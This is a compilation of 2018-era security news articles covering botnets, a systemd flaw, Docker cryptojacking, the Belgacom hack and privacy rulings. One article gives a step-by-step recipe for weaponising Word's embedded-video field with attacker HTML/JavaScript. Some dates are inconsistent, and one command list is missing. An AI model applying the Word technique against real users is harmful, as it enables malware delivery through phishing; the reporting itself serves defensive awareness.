In this year's midterms — as in the 2016 election — roughly 1 in 5 voters will use such electronic machines. Their tallies cannot be verified because they produce no paper record.

Cortes decided to decertify all such systems. If anyone tried to break in and alter votes, he concluded, "there was really no way for us to tell if that had happened." Hart InterCivic's vice president of operations, Peter Lichtenheld, did not dispute Cortes' account in July Senate testimony, but said its Virginia customers were already moving to newer machines.

At the federal level, no authority accredits election vendors or vets them or their subcontractors. No federal law requires them to report security breaches or to perform background checks on employees or subcontractors.

Election vendors don't even have to be U.S. companies. Dominion was Canadian-owned until July, when a New York private equity firm bought a controlling interest.

Federal oversight is limited to the little-known Election Assistance Commission, a 30-employee agency that certifies voting equipment but whose recommendations are strictly voluntary. It has no oversight power and cannot sanction manufacturers for any shortcomings.

"We can't regulate," EAC chairman Thomas Hicks said during a July 11 congressional hearing when the question came up. Neither can DHS, even though it designated the nation's election systems "critical infrastructure" in early 2017.

Recently discovered DemonBot Botnet targets Hadoop servers
30.10.2019 securityaffairs

Security experts from Radware have spotted a new botnet dubbed DemonBot that it targeting Hadoop clusters to launch DDoS attacks against third parties.
Operators behind the DemonBot botnet target an unauthenticated remote command execution in Hadoop YARN (Yet Another Resource Negotiator).

DemonBot bot only infects central servers, at the time of the report experts found over 70 active exploit servers spreading the malware and targeting systems at an aggregated rate of over 1 million exploits per day.

“DemonBot spreads only via central servers and does not expose worm-like behavior exhibited by Mirai based bots. As of today, Radware is tracking over 70 active exploit servers that are actively spreading DemonBot and are exploiting servers at an aggregated rate of over 1 Million exploits per day.” reads the analysis published by Radware.

“Note that though we did not find any evidence that DemonBot is actively targeting IoT devices at this time, Demonbot is not limited to x86 Hadoop servers and is binary compatible with most known IoT devices, following the Mirai build principles.”

Even if the binary is compatible with most known Internet of Things (IoT) devices, the bot was not observed targeting smart objects until now.

Experts investigating the botnet discovered that the malware author had actually published the source code for the bot on Pastebin at the end of September.

“Searching through pastebin archives soon revealed a unique match on a document that was pasted on Sept 29th by an actor going by the alias of Self-Rep-NeTiS. The paste contained the full source code for a botnet which the actor dubbed ‘DemonBot’.” reads the report.

“Further searches through the archives revealed the source code for the Command and Control server DemonCNC and the Python Build script for the multi-platform bots.”

The DemonBot C&C server provides two services:

a listener that allows bots to register and listen for new commands from the server;
a remote access CLI that allows admins and potential ‘customers’ to control the botnet.
When the malicious code is started, it connects in plain text TCP to the C&C server, IP address and port are hardcoded (default port 6982).

The malware first collects information on the system (IP address, port number (22 or 23, depending on the availability of Python or Perl and telnetd on the server)), then send them to C2.

The operators can send the bot the following commands:


wThe commands also include a <spoofit> argument that works as a netmask, it allows to spoof the bot’s source IP if the spoofit number is set to less than 32.

Further details, including IoCs, are reported in the analysis published by Radware.

‘DemonBot' Botnet Targets Hadoop Servers
29.10.2019 securityweek

A newly discovered botnet is targeting Hadoop clusters in an attempt to leverage their computing power to launch distributed denial of service (DDoS) attacks.

The operation, Radware security researchers have discovered, targets an unauthenticated remote command execution in Hadoop YARN (Yet Another Resource Negotiator). Proof-of-concept for the flaw was first published in March this year.

Dubbed DemonBot, the malware doesn’t employ worm-like capabilities, meaning that it only infects central servers. At the moment, there are over 70 active exploit servers spreading the threat and targeting systems at an aggregated rate of over 1 million exploits per day, Radware says.

The malware’s binary, the security researchers discovered, is compatible with most known Internet of Things (IoT) devices, but the bot was not seen targeting IoT until now.

During their investigation, the Radware researchers discovered that the malware author had actually published the source code for the botnet on pastebin at the end of September. The code for the command and control (C&C) server and the Python build script for the multi-platform bots were also discovered.

The C&C server provides two services, one that allows bots to register and listen for new commands from the server, and a remote access CLI so that admins and potential ‘customers’ can control the botnet. Credentials for remote users are stored in a plain text file.

Upon execution, the DemonBot malware connects to the C&C server (hardcoded with IP and port) and starts listening to commands. By default, it uses port 6982, while the connection is plain text TCP.

The threat sends to the server information on the infected system, including the public IP address, port number (22 or 23, depending on the availability of Python or Perl and telnetd on the server), information on the availability of a Python or Perl interpreter on the device server, the architecture of the server, and operating system.

The operator can send the bot commands to launch DDoS attacks such as UDP with a random payload, TCP, UDP with a fixed payload, or the sequential execution of STD attack, followed by TCP, followed by UDP. The bot can also be instructed to make a TCP connection to a specified IP and port each second until the attack is over, or to completely stop the attack.

“If multiple IPs are passed in the argument in a comma-separated list, an individual attack process is forked for each IP,” Radware said.

The attacker can also include a <spoofit> argument in the attack command, which works as a netmask, spoofing the bot’s source IP if the spoofit number is set to less than 32.

Mirai Author Gets House Arrest for DDoS Attacks on University
29.10.2019 securityweek

The author of the Mirai malware has been sentenced to six months of house arrest and ordered to pay $8.6 million in restitution for launching distributed denial-of-service (DDoS) attacks against the systems of Rutgers University.

Paras Jha, 22, of Fanwood, New Jersey, was sentenced on Friday in a New Jersey court after pleading guilty to violating the Computer Fraud and Abuse Act (CFAA). In addition to home confinement and paying restitution, Jha’s sentence includes 2,500 hours of community service and five years of supervised release.

Authorities accused him of launching several DDoS attacks on Rutgers between November 2014 and September 2016.

“Jha’s attacks effectively shut down Rutgers University’s central authentication server, which maintained, among other things, the gateway portal through which staff, faculty, and students delivered assignments and assessments,” the Justice Department said on Friday. “At times, Jha succeeded in taking the portal offline for multiple consecutive periods, causing damage to Rutgers University, its faculty, and its students.”

In September, Jha, along with Josiah White and Dalton Norman, were sentenced in Alaska to five years of probation, 2,500 hours of community service, and ordered to pay $127,000 in restitution for creating and using Mirai and another botnet.

Authorities said at the time that the trio had “cooperated extensively” with the FBI on complex cybercrime investigations. They had also been ordered to cooperate with law enforcement and the research community.

The Mirai botnet ensnared a large number of IoT devices, allowing cybercriminals to launch powerful DDoS attacks and conduct click fraud. According to investigators, Jha, White and Dalton earned roughly $180,000 through their click fraud scheme.

Microsoft Creates Sandbox for Windows Defender
29.10.2019 securityweek

Microsoft announced on Friday that Windows Defender, the antivirus application shipped with the company’s operating systems, can now run in a sandbox, and the tech giant claims it’s the first product of its kind to have this capability.

Microsoft has admitted that both its own employees and external researchers have identified vulnerabilities in Windows Defender, and given that it’s a program that runs with high privileges it can be an attractive target for malicious actors.

By allowing Windows Defender to run in a sandbox, Microsoft aims to increase the application’s resistance to attacks, particularly on the latest version of Windows 10, which includes significant protections and on which privilege escalation from a sandbox should be much more difficult.

Running the antivirus application in a sandbox should ensure that if it becomes compromised, the attacker’s actions are restricted and the rest of the system remains protected.

“Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community,” Microsoft said in a blog post. “It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.”

In order to build a sandbox for Windows Defender, Microsoft said it had to overcome several challenges.

The company has created two layers: one for components that can be sandbox and one for components that require full privileges on the system. In order to avoid a negative impact on performance, interaction between these layers needs to be minimal and it needs to take place at key moments.

Microsoft also had to figure out a way to reduce the usage of resources while ensuring that the level of security provided by Windows Defender is not decreased.

The sandboxing feature will be rolled out gradually to insiders running Windows 10 version 1703 or later. Users can also manually enable it by setting a certain environment variable (setx /M MP_FORCE_USE_SANDBOX 1).

The company is encouraging members of the community to test out the new sandboxed Windows Defender and provide feedback. Microsoft says it’s already working on additional anti-tampering mechanisms for Windows Defender.

Logical Bug in Microsoft Word's 'Online Video' Allows Code Execution
29.10.2019 securityweek

Microsoft Office is impacted by a logical bug that allows an attacker to abuse the “online video” feature in Word to execute malicious code, Cymulate security researchers warn.

The issue, which supposedly impacts all users of Office 2016 and older, can be exploited without special configuration, the security researchers say. Furthermore, no security warning is presented to the user when a malicious document abusing the flaw is opened.

According to Cymulate, the vulnerability is created when the user uses the 'online video' feature to embed a video into their document. The bug resides in the associated document.xml file, which contains a parameter called embeddedHtml (under WebVideoPr) that refers to a YouTube iframe code.

The issue, the researchers say, is that an attacker could replace the YouTube iframe code with malicious HTML/JavaScript code that would run in the background. Instead of linking to the actual YouTube video, the payload would open Internet Explorer Download Manager with the embedded code execution file.

The researchers also created a proof-of-concept code that contains the embedded executable as a blob of base64. Once executed, the code uses the msSaveOrOpenBlob method to trigger the download of the executable via Internet Explorer Download Manager, with the option to either run or save the file.

The bug was reported to Microsoft three months ago, Avihai Ben-Yossef, co-founder and CTO of Cymulate, told SecurityWeek via email. However, the Redmond-based software giant did not acknowledge it as a security vulnerability, he also revealed.

“As this specific evasion could also be considered as a vulnerability, we’ve submitted this to Microsoft 3 months ago before we’ve implemented it in our platform. They didn’t acknowledge it as a flaw,” Ben-Yossef says.

Attackers looking to abuse this flaw could hide executable code into Word documents and then abuse social engineering to trick users into opening those documents as part of phishing attacks.

IBM buys Red Hat for $34 Billion, it is largest software transaction in history
29.10.2019 securityaffairs

IBM announced it is going to buy the open source company Red Hat for $34bn with the intent to enhance its cloud offerings.
This is the biggest tech merger in history involving a software company. Red Hat was founded in 1993, it currently operates in 35 countries and employs some 12,000 people. The company achieved a net profit of $259 million in the fiscal year 2018 on a turnover of $ 2.9 billion (up 21 percent on 2017).

At the same time, IBM has seen revenue decline by almost a quarter since 2012, when Rometty took the CEO role,

IBM is going to acquire all common shares of Red Hat for $190.00 per share in cash, consider that each share was traded on Friday at $116.68.

“The acquisition of Red Hat is a game-changer. It changes everything about the cloud market,” explained Ginni Rometty, IBM’s chairman, president and CEO.

“IBM will become the world’s number one hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses.”

Cloud computing is today a primary business for IBM, it is definitely shifting from original computer hardware trading to analytics, mobile, and cybersecurity.

The Red Hat acquisition will give IBM an immediate cloud revenue boost growth and will allow the tech giant to increment its offering and make upsell on a large number of enterprised that already use Red Hat solution.

“We will scale what Red Hat has deeply into many more enterprises than they’re able to get to,” Rometty told Bloomberg in a phone interview.

Red hat

Red Hat will continue to operate in total autonomy and it will be led by its current president and CEO Jim Whitehurst along with the same management team.

“Today is a banner day for open source,” said Paul Cormier, Red Hat’s vice president and president of products and technologies.

“The largest software transaction in history and it’s an open source company. Let that sink in for a minute. We just made history.”

The deal will be completed once received the Red Hat shareholder approval as well as regulatory approvals, the operation will be completed in H2 2019.

Systemd flaw could cause the crash or hijack of vulnerable Linux machines
29.10.2019 securityaffairs

Systemd is affected by a security vulnerability that can be exploited to crash a vulnerable Linux machine, and in the worst case to execute malicious code.
An attacker can trigger the vulnerability using maliciously crafted DHCPv6 packets and modifying portions of memory of the vulnerable systems, potentially causing remote code execution.

The flaw, tracked as CVE-2018-15688, was reported by Felix Wilhelm, from the Google Security team, Wilhelm explained that the overflow can be triggered by an attacker in an easy way by advertising a DHCPv6 server with a server-id >= 493 characters long.

“The function dhcp6_option_append_ia function is used to encode Identity Associations received by the server into the options buffer of an outgoing DHCPv6 packet” wrote Wilhelm.

“The function receives a pointer to the option buffer buf, it’s remaining size buflen and the IA to be added to the buffer. While the check at (A) tries to ensure that the buffer has enough space left to store the IA option, it does not take the additional 4 bytes from the DHCP6Option header into account (B). Due to this the memcpy at (C) can go out-of-bound and *buflen can underflow in (D) giving an attacker a very powerful and largely controlled OOB heap write starting at (E). The overflow can be triggered relatively easy by advertising a DHCPv6 server with a server-id >= 493 characters long.”

The flaw resides in the DHCPv6 client of the open-source Systemd management suite that is implemented into several Linux distros (Ubuntu, Red Hat, Debian, Fedora, CoreOS, Mint, and SUSE Linux Enterprise Server).

If the IPv6 support is enabled, the DHCPv6 client of the open-source Systemd management suite is automatically activated to process arriving packers.

Experts pointed out that the DHCPv6 clients could be wake up by specially crafted router advertisement messages sent by a rogue DHCPv6 server on a network, or in an ISP. In both scenarios, the attackers can enable the DHCPv6 clients and trigger the vulnerability to crash or hijack the Systemd-powered Linux machines.

Both Ubuntu and Red Hat Linux published a security advisory on the issue. summary:

“systemd–networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network adjacent DHCP servers. A attacker could exploit this via malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.” reads the advisory published by Red Hat.

“Felix Wilhelm discovered that systemd-networkd’s dhcp6 client could be made to write beyond the bounds (buffer overflow) of a heap allocated buffer when responding to a dhcp6 server with an overly-long server-id parameter.” reads the advisory published by Ubuntu.

The author of Systemd, Leonard Poettering, promptly published a security fix for Systemd-based Linux system relying on systemd-networkd.

Crooks continue to abuse exposed Docker APIs for Cryptojacking
29.10.2019 securityaffairs
Cryptocurrency  Cyber

Cybercriminals continue to abuse unprotected Docker APIs to create new containers used for cryptojacking, Trend Micro warns.
Crooks continue to abuse unprotected Docker APIs to create new containers used for cryptojacking.

Earlier this year Sysdig and Aqua Security researchers started observing cyber attacks targeting Kubernets and Docker instances aimed at mining Monero cryptocurrency.

A container is a package that contains an application and all the dependencies that are required to its execution. Each Docker container runs on Docker Engine along with other containers. Experts pointed out that a Docker Engine is not properly secured could be exposed to remote attack through Docker Engine API.

Miscreants can abuse Docker Engine API to deploy containers they have created with the specific intent of mining cryptocurrencies.

docker api abuse-3

Experts from Trend Micro have recently observed threat actors scanning for exposed Docker Engine APIs (port 2375 and 2376), attackers aimed at abusing them to deploy containers that used for cryptojacking.

“We recently observed cases of abuse of the systems running misconfigured Docker Engine-Community with Docker application program interface (API) ports exposed. We also noticed that the malicious activities were focused on scanning for open ports 2375/TCP and 2376/TCP, which are used by the Docker engine daemon (dockerd).” reads the analysis published by Trend Micro.

“The intrusion attempts to deploy a cryptocurrency-mining malware (detected by Trend Micro as Coinminer.SH.MALXMR.ATNE) on the misconfigured systems.”

The researchers observed that hackers often create Docker containers through exposed API ports and run the following commands on compromised installs:
Install a wget package using system package manager.
Use wget to download an auto-deployment script.
Convert the script from DOS to Unix format (the script line endings are often in DOS format).
Set the executable permissions for the script.
Run the script (auto.sh).
The auto.sh script deploys a Monero miner and also a port scanning software, which will scan for other vulnerable Docker Engine installs.

Experts have seen attackers scanning all networks from the host with a scan rate of 50,000 packets per second for open ports 2375 and 2376 and save the result into local.txt file.

The attackers conduct lateral movement by infecting or abusing other hosts identified in previous reconnaissance scans.

Experts provided recommendations to secure Docker Engine installs, below best practices provided by Trend Micro:

Harden the security posture. The Center for Internet Security (CIS) has a reference that can help system administrators and security teams establish a benchmark to secure their Docker engine.
Ensure that container images are authenticated, signed, and from a trusted registry (i.e., Docker Trusted Registry). Employing automated image scanning tools helps improve development cycles.
Enforce the principle of least privilege. For instance, restrict access to the daemon and encrypt the communication protocols it uses to connect to the network. Docker has guidelines on how to protect the daemon socket.
Properly configure how much resources containers are allowed to use (control groups and namespaces).
Enable Docker’s built-in security features to help defend against threats. Docker has several guidelines on how to securely configure Docker-based applications.

The Belgacom hack was the work of the UK GCHQ intelligence agency
29.10.2019 securityaffairs
BigBrothers  Incindent

Belgian newspaper reported that investigators had found proof that the Belgacom hack was the work of the UK GCHQ intelligence agency.
Back to September 2013, Belgacom (now Proximus), the largest telecommunications company in Belgium and primarily state-owned, announced its IT infrastructure had suffered a malware-based attack.

Here we are again to speak about this incident after the Belgian newspaper De Standaard provided more details from a Belgian judicial investigation that was investigating the alleged involvement of British GCHQ.

Many experts linked the Regin malware to the Five Eyes alliance, they found alleged references to the super spyware in a number of presentations leaked by Edward Snowden and according to malware researchers, it has been used in targeted attacks against government agencies in the EU and the Belgian telecoms company Belgacom.

According to Snowden, the UK’s signals intelligence have hacked into the Belgian telco to spy on private communications in transit into its infrastructure.

This week the Belgian newspaper De Standaard reported that investigators had found proof that the hack “was the work of the GCHQ, an intelligence service of ally Great Britain”.

“This can all be read in a confidential report from the federal prosecutor’s office that the National Security Council discussed at the beginning of this week,” reported De Standaard.

The newspaper also states that federal prosecutors found evidence for the involvement of the UK intelligence in the hack that is not related to Snowden revelations.

“Specifically, these are IP addresses of computers where the spyware software communicated from Belgacom. Three of those addresses were owned by a British company, indicating that the spy software manager is in Great Britain,” continues the newspaper.

belgacom hack

The newspaper added that British Home Office refused to co-operate with the investigation.

If confirmed the situation is disconcerting, the UK was spying, along with other members of the FiveEyes, on a telco company belonging to a member of the NATO alliance.

The investigation revealed that the malware-based attack was powered by GCHQ and code-named Operation Socialist.

The attack between 2000 and early 2010, the hackers targeted company admins with spear-phishing attacks aimed at infecting their machines.

Attackers infected at least three Belgian techies’ machines and used them as entry points into the Belgacom’s networks, then they infected more than 5,000 machines.

“A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.” wrote The Intercept.

“The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

GCHQ targeted the Belgacom International Carrier Services mainly because it handled a large amount of Middle Eastern roaming traffic.

How to deliver malware using weaponized Microsoft Office docs embedding YouTube video
29.10.2019 securityaffairs

Researchers at Cymulate security firm devised a new stealthy technique to deliver malware leveraging videos embedded into weaponized Microsoft Office Documents.
The technique could be used to execute JavaScript code when a user clicks on a weaponized YouTube video thumbnail embedded in a Weaponized Office document.

Experts pointed out that no message is displayed by Microsoft Office to request the victim’s consent.

“Cymulate’s research team has discovered a way to abuse the Online Video feature on Microsoft Word to execute malicious code. Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden html/javascript code that will be running in the background and could potentially lead to further code execution scenarios.” reads the analysis published by Cymulate.

“This attack is carried out by embedding a video inside a Word document, editing the XML file named document.xml, replacing the video link with a crafted payload created by the attacker which opens Internet Explorer Download Manager with the embedded code execution file”

The experts created a proof-of-concept attack using a YouTube video link embedded in weaponized Microsoft Office documents.

When a video is embedded in a Word document, an HTML script is created and it is executed by Internet Explorer when the thumbnail into the document is clicked.

The researchers found a way to modify that HTML script to point to malware instead of the real YouTube video.

A default XML file named ‘document.xml’ can be edited by an attacker, in particular, it is possible to modify the video configuration included in a parameter called ’embeddedHtml’ and an iFrame for the YouTube video, which can be replaced with attacker HTML.

In the attack scenario presented by the researchers, they included in their own HTML a Base64-encoded malware binary that opens the download manager for Internet Explorer, that in turn installs the malicious code.

The expected video will be displayed without raising suspicious, while the malware is silently installed on the victim’s machine. Expert shared a video PoC of the attack.

Below the workflow of the attack:

Create a Word Document.
Embed an online video: Insert -> online video and add any YouTube video.
Save the Word document with the embedded online video.
Unpack the Word document: Docx files are actually a package of all the media files that you may see in a docx file. If you unpack the file – either by using an unpacker or changing the docx extension to zip and unzipping it – there are several files and directories in a single docx file:
Edit the document.xml file under word folder
Inside the .xml file, look for embeddedHtml parameter (under WebVideoPr) which contains the Youtube iframe code. Replace the current iframe code with any html code / javascript to be rendered by Internet Explorer.
Save the changes in document.xml file, update the docx package with the modified xml and open the document.
The experts demonstrated that just tricking victims into opening the weaponized document and click on the embedded video is possible to infect their machines.

Ben-Yossef said, CTO at Cymulate, explained antimalware detection depends on the specific payload used in the attack and the evasion techniques it implements.

The technique works with Office 2016 and older versions, the researchers notified Microsoft but that the tech giant doesn’t acknowledge the technique as a security flaw.

David Phillips
· Oct 25, 2018
Replying to @CymulateLtd
Appreciate it's good publicity for you, but the usual process is that you give the vendor adequate time to fix the issue before you go public with it.

Hi David, thank you for your note. We did follow the correct process, we notified Microsoft of this issue and provided all the information. Who then responded with an approval to publish. We hope you find this information relevant.

5:48 PM - Oct 25, 2018
See Cymulate's other Tweets
Twitter Ads info and privacy
Organizations can mitigate the attack by blocking any Word document containing embedded videos.

Analysis of North Korea's Internet Traffic Shows a Nation Run Like a Criminal Syndicate
28.10.2019 securityweek
BigBrothers  Cyber

Recorded Future has published a series of analyses on North Korea's most senior leadership's use of the internet. As the last report of the series, it demonstrates how adaptable this leadership has become in both using and monetizing its use of the internet.

The leadership's pattern of global internet usage has shifted. A year ago, it peaked at the weekends, primarily for online gaming and video streaming. Over the last year, weekday usage has increased while weekend use has decreased (although weekend use is still primarily for gaming and streaming). Recorded Future does not know why this shift has occurred, but suggests that it is indicative of the global internet becoming a greater part of the leaders' every day work.

Concurrent with this pattern change has been the construction of North Korea's new Internet Communications Bureau headquarters in Pyongyang. The combination of changing usage patterns and the completion of this building could, suggests Recorded Future, "signify a professionalization of internet use across North Korea's most senior leadership. This would mean that these leaders utilize the internet to a greater extent as part of their jobs, as opposed to for their own entertainment."

North Korea Cybercrime ActivityNoticeably, an earlier spike in the use of secure browsing (use of Tor, VPNs, etcetera) has diminished. The report suggests the spike may have been caused by an internal policy requirement, "which then slowly waned over time as the costs in time, money, and accessibility began to outweigh the benefits."

A move away from the use of Western social media in favor of Chinese equivalents such as Baidu, Alibaba, and Tencent was first detected in late 2017. This has persisted -- except for LinkedIn, where usage has increased.

Cryptocurrencies are known to be used by North Korea as a form of foreign exchange. North Korean cybercriminals are thought to be behind numerous raids on cryptocurrency exchanges in recent years. Recorded Future now believes the country has also been involved in at least two cryptocurrency scams.

The first involved the altcoin HOLD. In early 2018 it went through the process of 'staking', where users mine an initial number of coins but are not allowed to trade them. The purpose is to build interest, value and a user base -- but it's a risky process since the developers control the staking timeframe and can limit the trades.

"Over the course of 2018," reports Recorded Future, "HOLD coin was listed and delisted on a series of exchanges, underwent a rebranding, changed its name to HUZU, and as of this publication, has left its investors high and dry. We assess with low confidence that North Korean users were involved in the Interstellar/Stellar/HOLD/HUZU altcoin."

The second scam that it assesses with high confidence was conducted on behalf of North Korea was a blockchain application called Marine Chain Platform. Recorded Future notes that in April and May 2018, the Marine Chain website was hosted on the same IP address that hosted Binary Tilt. Binary Tilt has been declared fraudulent by the government of Ontario, Canada. Dozens of users have posted testimonials of losses of tens to hundreds of thousands of dollars and scams on this site.

Recorded Future has traced Marine Chain connections to North Korea. In particular, Marine Chain's CEO, Captain Foong, has been connected to Singaporean companies that have assisted North Korean sanctions circumvention efforts since at least 2013. "Capt. Foong," claims the report, "is part of a network of enablers throughout the world that assist North Korea in circumventing international sanctions. These connections to Marine Chain Platform mark the first time this vast and illicit network has utilized cryptocurrencies or blockchain technology to raise funds for the Kim regime."

A heuristic developed by Recorded Future to analyze internet traffic between North Korea and other countries has, in the past, enabled the firm to identify eight nations where North Koreans were physically located or living, including India, China, Nepal, Kenya, Mozambique, Indonesia, Thailand, and Bangladesh. Improvements to the heuristic have enable the firm to gain deeper insight on data from China and India.

In China, this has discovered high volumes of activity involving the Beijing, Shanghai, and Shenyang regions, and also Nanchang, Wuhan, and Guangzhou. It also enables the firm to state with moderate confidence that seven Chinese universities have currently or previously hosted North Korean students, teachers or partners.

In India, Recorded Future detected high volumes of activity involving Delhi, Bangalore, Kolkata, and Hyderabad. It observed suspicious traffic involving the Indian Meteorological Department and National Remote Sensing Centre, but was unable to determine maliciousness.

The heuristic found an overlap with known North Korean illicit financing or logistics networks -- but not for Russia. Internet activity with Russia amounts to just 0.5% of that with China. Recorded Future turned to a report published in August by the non-profit organization C4ADS. This includes the comment, that as much as 80% of North Korea's overseas workforce is located in China and Russia. The implication is that far more North Koreans live and work in Russia than is suggested by the comparison of internet traffic between the two countries.

The C4ADS report also notes, "some estimates suggest that North Korean laborers may generate as much as $1.2 to $2.3 billion USD per year for the Kim regime, which -- if true -- would be equivalent to as much as 93% of North Koreaís total exports in 2016." It adds that most worksites exhibit features characteristic of forced labor. The laborers work 12- to 16-hour days and hand over between 70% and 90% to handlers to be sent back to North Korea.

Recorded Future suggests that the difference in North Korea/Russia and North Korea/China internet traffic is that the former work as laborers with no internet requirement, while the latter work in the information economy, building mobile games, apps, bots, and other IT products for a global customer base. "This type of information economy work," writes Recorded Future, "creates a different internet fingerprint than exploitative manual labor and likely clarifies the discrepancy between physical presence and internet activity."

Recorded Future concludes that its research "has demonstrated how adaptable and innovative North Korea's most senior leadership are. They are quick to embrace new services or technologies when useful and cast them aside when not. The Kim regime has developed a model for using and exploiting the internet that is unique -- it is a nation run like a criminal syndicate."

Apple and Samsung fined millions for “planned obsolescence” of old smartphones
28.10.2019 securityweek

Italian Competition Authority AGCM fined Apple and Samsung a 5 million Euros and 10 million Euros for “planned obsolescence” of their mobile devices.
After a long investigation conducted by the Italian Competition Authority AGCM, the agency has fined Apple and Samsung a 5 million Euros ($5.8 Million) and 10 million Euros ($11.5 Million) for “planned obsolescence” of their mobile devices.

According to the Authority, the tech giants companies would have provided software updates on devices that were not able to support them, without providing accurate and correct information and without allowing any subsequent uninstallations
Both companies are accused to have been slowing down their old devices with the intent of encouraging users to purchase new devices.

In particular, Samsung was challenged for the update issued on May 2016 for Galaxy Note 4, while for Apple the AGCM questioned the update issued on September 2016 for the several devices supported at the time (i.e. iPhone 6 and 6s); Apple failed in providing the correct information of consumers about the effects of the updates that had an important impact on the performance and autonomy of the batteries.

“As a result of two complex investigations, the Italian Competition Authority – AGCM has ascertained that companies of Samsung group and Apple group have carried out unfair commercial practices in violation of Articles 20, 21, 22 and 24 of the Consumer Code in relation to the release of some firmware updates for their mobile phones which caused serious malfunctions and significantly reduced their performance, in this way speeding up their replacement with more recent products.” ” AGCM said in a statement.

“The two companies have induced consumers – by insistently proposing to proceed with the download and also because of the significant information asymmetry of consumers vis-a-vis the producers – to install software updates that are not adequately supported by their devices, without adequately informing them, nor providing them an effective way to recover the full functionality of their devices.”

Back in December 2017, Apple apologized for slowing down older iPhones, the company introduced features, that impacted the iPhone 6, 6S, 7 and SE, to cope with aging batteries.

On the other end, In January Samsung announced that it “does not provide the software updates to reduce the product performance over the life cycle of the device.”

A few dollars to bring down sites with new Bushido-based DDoS-for-hire service
28.10.2019 securityaffairs

Security researchers at FortiGuard Labs have discovered a new DDoS-for-hire service called “0x-booter” built with leaked code that implements an easy to use interface.
“0x-booter” first appeared on October 17, 2018, a post published on Facebook advertises over 500 Gbps of power and 20,000 bots.

“During our regular monitoring, the FortiGuard Labs team recently discovered a new platform offering DDoS-for-hire service called “0x-booter.”” reads the analysis published by Fortinet.

“First appearing on October 17, 2018, 0x-booter is available to anyone who signs up on the website. As shown in the following figures, this service comes with an explicitly defined user interface which enables practically anyone to learn and use the service.”

The DDoS-for-hire service is powered by the Bushido IoT botnet, experts at Fortinet believe the service has lower capabilities and fewer bots At the time of the analysis the 0x-booter’s service was able to carry out 424.825 Gbps attacks leveraging of 16,993 bots.

Anyway, this firepower is enough to create severe problems to target websites.

DDoS-for-hire 2.png

The DDoS-for-hire service allows users to power different attacks, primarily at the Transport and Application layers.

The prices for 0x-booter service range from $20 to $150, depending on various parameters, including the number of attacks, the duration of an attack, and customer support offered by the operators.

Researchers were able to uncover following JSON files that provided information on the service:

typeattack.php – this file contains a list of every available DDoS method with its corresponding value of conducted attacks
dateattack.php – this file contains a list of dates with the corresponding number of all attack methods conducted per day
According to the content of the second file, the service was used to power more than 300 attacks since Oct 14th.

The Bushido botnet is run by a group called ZullSec, it was first spotted by the security researchers at MalwareMustDie, the same that discovered the dreaded Mirai botnet.

The botnet was a modification of the Mirai bot, but Bushido was improved to launch a DDoS attack and implements more options.
“After analysing both the website and the botnet, we discovered that the codes used have been copy-pasted from an open source and modified for their own purposes.” continues the analysis.

“In fact, the 0x-booter website was based on another booter/ stresser called Ninjaboot, the source code of which was leaked in hacking forums last year. Even though the Bushido botnet has its own name, it still borrows a lot of its code from Mirai and is still considered a fork of Mirai.”

Experts pointed out that would-be crooks with just a few clicks, a few dollars, and a little knowledge about botnet can power severe attacks and cause great damage.
Technical details about the service are included in the analysis published by Fortinet.

Apple CEO Backs Privacy Laws, Warns Data Being 'Weaponized'
27.10.2019 securityweek

The head of Apple on Wednesday endorsed tough privacy laws for both Europe and the U.S. and renewed the technology giant's commitment to protecting personal data, which he warned was being "weaponized" against users.

Speaking at an international conference on data privacy, Apple CEO Tim Cook applauded European Union authorities for bringing in a strict new data privacy law in May and said the iPhone maker supports a U.S. federal privacy law .

Cook's speech, along with video comments from Google and Facebook top bosses, in the European Union's home base in Brussels, underscores how the U.S. tech giants are jostling to curry favor in the region as regulators tighten their scrutiny.

Data protection has become a major political issue worldwide, and European regulators have led the charge in setting new rules for the big internet companies. The EU's new General Data Protection Regulation, or GDPR, requires companies to change the way they do business in the region, and a number of headline-grabbing data breaches have raised public awareness of the issue.

"In many jurisdictions, regulators are asking tough questions. It is time for rest of the world, including my home country, to follow your lead," Cook said.

"We at Apple are in full support of a comprehensive federal privacy law in the United States," he said, to applause from hundreds of privacy officials from more than 70 countries.

In the U.S., California is moving to put in regulations similar to the EU's strict rules by 2020 and other states are mulling more aggressive laws. That's rattled the big tech companies, which are pushing for a federal law that would treat them more leniently.

Cook warned that technology's promise to drive breakthroughs that benefit humanity is at risk of being overshadowed by the harm it can cause by deepening division and spreading false information. He said the trade in personal information "has exploded into a data industrial complex."

"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency," he said. Scraps of personal data are collected for digital profiles that let businesses know users better than they know themselves and allow companies to offer users "increasingly extreme content" that hardens their convictions, Cook said.

"This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them," he said. "This should make us very uncomfortable. It should unsettle us."

Cook's appearance was one-up on his tech rivals and showed off his company's credentials in data privacy, which has become a weak point for both Facebook and Google. That is facilitated also by the fact that Apple makes most of its money by selling hardware like iPhones instead of ads based on user data.

"With the spotlight shining as directly as it is, Apple have the opportunity to show that they are the leading player and they are taking up the mantle," said Ben Robson, a lawyer at Oury Clark specializing in data privacy. Cook's appearance "is going to have good currency," with officials, he added.

His speech comes a week after Apple unveiled expanded privacy protection measures for people in the U.S., Canada, Australia and New Zealand, including allowing them to download all personal data held by Apple. European users already had access to this feature after GDPR took effect. Apple plans to expand it worldwide.

Facebook CEO Mark Zuckerberg and Google head Sundar Pichai sent brief video remarks to the annual meeting of global data privacy chiefs.

Zuckerberg said the social network takes seriously its "basic ethical responsibility" to safeguard personal information but added that "the past year has shown we have a lot more work to do," referring to a big data breach and the scandal over the misuse of data by political consultancy Cambridge Analytica.

